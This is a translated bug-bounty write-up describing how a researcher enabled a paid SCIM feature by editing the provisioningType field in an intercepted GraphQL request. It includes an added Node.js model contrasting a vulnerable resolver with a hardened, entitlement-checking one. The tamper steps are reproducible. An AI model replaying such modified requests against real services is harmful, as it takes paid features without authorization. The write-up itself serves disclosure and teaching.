White Hat Stories · 21 August 2024

IDOR: How to Break a Subscription Restriction

Preface

As everyone knows, the admin pages of many subscription products bundle a lot of functionality: usage, data, user and access management, and so on.

Today I am sharing an overseas case in which a business-logic flaw was used to get around a subscription plan restriction. Without further ado, let's begin.

Vulnerability details

The white-hat researcher happened upon a user-management screen for Authentication Domains. As shown below, it is used to create an authentication domain, rename the default one, or change its settings:

[screenshot]

He also noticed that the same screen offered an upgrade to the Pro plan, meaning that some of its features are paid:

[screenshot]

After some testing, he eventually found a way around the restriction.

First, open user management:

[screenshot]

Then click the user settings button:

[screenshot]

Change the value here and intercept the request:

[screenshot]

The intercepted request shows that the backend uses GraphQL:

POST /graphql HTTP/2
Host: redacted.com
Cookie: xxxxxxxxxxxxx
Content-Length: 2723
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://redacted.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

{"operationName":"AuthenticationDomainUpdateMutation","variables":{"includeScimConfiguration":false,"includeSamlConfiguration":false,"id":"d937a430-7593-4b86-b073-a14dcd20a229","name":"momen0x00","authenticationType":"PASSWORD","provisioningType":"MANUAL","basicFullTierChangeApproval":"ADMIN_REVIEW","coreFullTierChangeApproval":"ADMIN_REVIEW","basicCoreTierChangeApproval":"ADMIN_REVIEW","idpManagedAttributes":[],"upgradeMessage":null,"upgradeButtonText":null,"upgradeButtonTargetUrl":null,"maxBrowserSessionDuration":2592000,"maxBrowserIdleDuration":604800},"query":"mutation AuthenticationDomainUpdateMutation($id: ID!, $name: String, $currentSamlConfigurationId: String, $currentScimConfigurationId: String, $authenticationType: String, $provisioningType: String, $maxBrowserSessionDuration: Int, $maxBrowserIdleDuration: Int, $basicCoreTierChangeApproval: String, $basicFullTierChangeApproval: String, $coreFullTierChangeApproval: String, $includeScimConfiguration: Boolean = false, $includeSamlConfiguration: Boolean = false, $postUpdateActions: [PostUpdateActions], $idpManagedAttributes: [IdpManagedAttributes], $upgradeMessage: String, $upgradeButtonText: String, $upgradeButtonTargetUrl: String) {\n updateAuthenticationDomain(\n input: {id: $id, name: $name, currentSamlConfigurationId: $currentSamlConfigurationId, currentScimConfigurationId: $currentScimConfigurationId, authenticationType: $authenticationType, provisioningType: $provisioningType, maxBrowserSessionDuration: $maxBrowserSessionDuration, maxBrowserIdleDuration: $maxBrowserIdleDuration, basicCoreTierChangeApproval: $basicCoreTierChangeApproval, basicFullTierChangeApproval: $basicFullTierChangeApproval, coreFullTierChangeApproval: $coreFullTierChangeApproval, postUpdateActions: $postUpdateActions, idpManagedAttributes: $idpManagedAttributes, upgradeMessage: $upgradeMessage, upgradeButtonText: $upgradeButtonText, upgradeButtonTargetUrl: $upgradeButtonTargetUrl}\n ) {\n id\n name\n authenticationType\n provisioningType\n maxBrowserSessionDuration\n maxBrowserIdleDuration\n basicCoreTierChangeApproval\n basicFullTierChangeApproval\n coreFullTierChangeApproval\n idpManagedAttributes\n upgradeMessage\n upgradeButtonText\n upgradeButtonTargetUrl\n currentSamlConfiguration @include(if: $includeSamlConfiguration) {\n idpSsoTargetUrl\n logoutRedirectUrl\n certificate\n certificateFilename\n assertionConsumerUrl\n spEntityId\n idpEntityId\n idpMetadata\n __typename\n }\n currentScimConfiguration @include(if: $includeScimConfiguration) {\n authenticationDomainId\n createdAt\n __typename\n }\n __typename\n }\n}\n"}

He then modified the following parameters in the request body (the values are the enum strings the API uses, so they must be spelled exactly as shown):

"name":"DEFAULT" changed to "name":"BUG"
"provisioningType":"MANUAL" changed to "provisioningType":"SCIM"

After forwarding the modified request, he returned to the Auth Domain screen:

[screenshot]

As you can see, the subscription restriction was bypassed successfully: SCIM provisioning, a paid feature, is now enabled on a domain whose plan never included it.

Strictly speaking, no object reference is swapped here, so this is less a classic IDOR than a missing server-side entitlement check. The front end hides the SCIM option from non-Pro tenants, but the updateAuthenticationDomain mutation accepts whatever provisioningType value the client sends and writes it without asking whether the tenant's plan includes it. The fix therefore belongs in the resolver (reject gated values the plan does not cover, and only copy allow-listed fields), not in the UI.
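To make the root cause concrete, here is an added example that is not code from the original write-up or from the affected product: a small in-memory model of the server side of AuthenticationDomainUpdateMutation in Node.js. It replays the tampered variables from the write-up (name DEFAULT to BUG, provisioningType MANUAL to SCIM) against a resolver that copies client input blindly and against a hardened one that checks the tenant's plan entitlements first. The plan names (FREE, PRO), the entitlement table, the ownership model and the resolver signatures are all assumptions made for this illustration; the sample store is constructed inline.

```javascript
// Added example, not the product's own code: a minimal model of the resolver
// behind AuthenticationDomainUpdateMutation, vulnerable and hardened.
// Plan names, the entitlement table, ownership and resolver shape are assumed.

// Assumed entitlement table: which provisioning and authentication types each
// subscription plan includes.  SCIM and SAML are modelled as Pro-only.
const PLAN_ENTITLEMENTS = {
  FREE: { provisioningTypes: ['MANUAL'], authenticationTypes: ['PASSWORD'] },
  PRO:  { provisioningTypes: ['MANUAL', 'SCIM'], authenticationTypes: ['PASSWORD', 'SAML'] },
};

// Fields the client may set through this mutation (assumed subset of the
// captured input object).  Server-owned fields such as plan are not listed.
const CLIENT_SETTABLE_FIELDS = [
  'name', 'authenticationType', 'provisioningType',
  'maxBrowserSessionDuration', 'maxBrowserIdleDuration',
];

// Constructed sample: the captured variables trimmed to the fields that matter,
// plus the two edits from the write-up (DEFAULT -> BUG, MANUAL -> SCIM).
const DOMAIN_ID = 'd937a430-7593-4b86-b073-a14dcd20a229';
const capturedVariables = {
  id: DOMAIN_ID, name: 'DEFAULT', authenticationType: 'PASSWORD', provisioningType: 'MANUAL',
};
const tamperedVariables = { ...capturedVariables, name: 'BUG', provisioningType: 'SCIM' };

// In-memory store standing in for the database: one domain owned by user u1,
// whose tenant is on the given plan (FREE by default).
function makeStore(plan = 'FREE') {
  return { domains: { [DOMAIN_ID]: { ...capturedVariables, ownerId: 'u1', plan } } };
}

// The part the app did get right: you can only edit a domain you own.
function loadOwnedDomain(store, ctx, id) {
  const domain = store.domains[id];
  if (!domain || domain.ownerId !== ctx.userId) throw new Error('domain not found');
  return domain;
}

// Vulnerable resolver: ownership is checked, but every client-supplied field is
// copied straight into the record, so a plan-gated value (and, for that matter,
// any server-owned field the client cares to send) sails through.
function vulnerableUpdateAuthenticationDomain(store, ctx, input) {
  const domain = loadOwnedDomain(store, ctx, input.id);
  const { id, ...fields } = input;
  Object.assign(domain, fields);
  return domain;
}

// Hardened resolver: same ownership check, then each gated value is compared
// against what the tenant's plan includes before anything is written, and only
// allow-listed fields are copied.
function hardenedUpdateAuthenticationDomain(store, ctx, input) {
  const domain = loadOwnedDomain(store, ctx, input.id);
  const allowed = PLAN_ENTITLEMENTS[domain.plan];
  if (!allowed) throw new Error(`unknown plan ${domain.plan}`);
  if (input.provisioningType !== undefined &&
      !allowed.provisioningTypes.includes(input.provisioningType)) {
    throw new Error(`plan ${domain.plan} does not include provisioningType ${input.provisioningType}`);
  }
  if (input.authenticationType !== undefined &&
      !allowed.authenticationTypes.includes(input.authenticationType)) {
    throw new Error(`plan ${domain.plan} does not include authenticationType ${input.authenticationType}`);
  }
  for (const field of CLIENT_SETTABLE_FIELDS) {
    if (input[field] !== undefined) domain[field] = input[field];
  }
  return domain;
}

// Run a resolver the way a GraphQL server would: an exception becomes an error
// response, and the store is left untouched for inspection.
function tryUpdate(resolver, store, ctx, input) {
  try {
    return { ok: true, domain: resolver(store, ctx, input) };
  } catch (err) {
    return { ok: false, error: err.message };
  }
}

// Replay the write-up's tampered request against both resolvers on a FREE tenant.
function demo() {
  const ctx = { userId: 'u1' };
  return {
    vulnerable: tryUpdate(vulnerableUpdateAuthenticationDomain, makeStore(), ctx, tamperedVariables),
    hardened: tryUpdate(hardenedUpdateAuthenticationDomain, makeStore(), ctx, tamperedVariables),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Running the file prints the vulnerable resolver accepting the request with provisioningType set to SCIM, and the hardened one returning an error while the stored domain keeps MANUAL. Note that the entitlement check happens before any field is written, so a rejected request leaves the record unchanged, and that a plain rename on a FREE tenant still succeeds because name is not plan-gated.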

The above was translated and compiled by 骨哥; I hope you find it useful.

Original article: https://0xmatrix.medium.com/hacking-the-system-how-i-beat-subscription-restrictions-in-admin-controls-5684fd90279a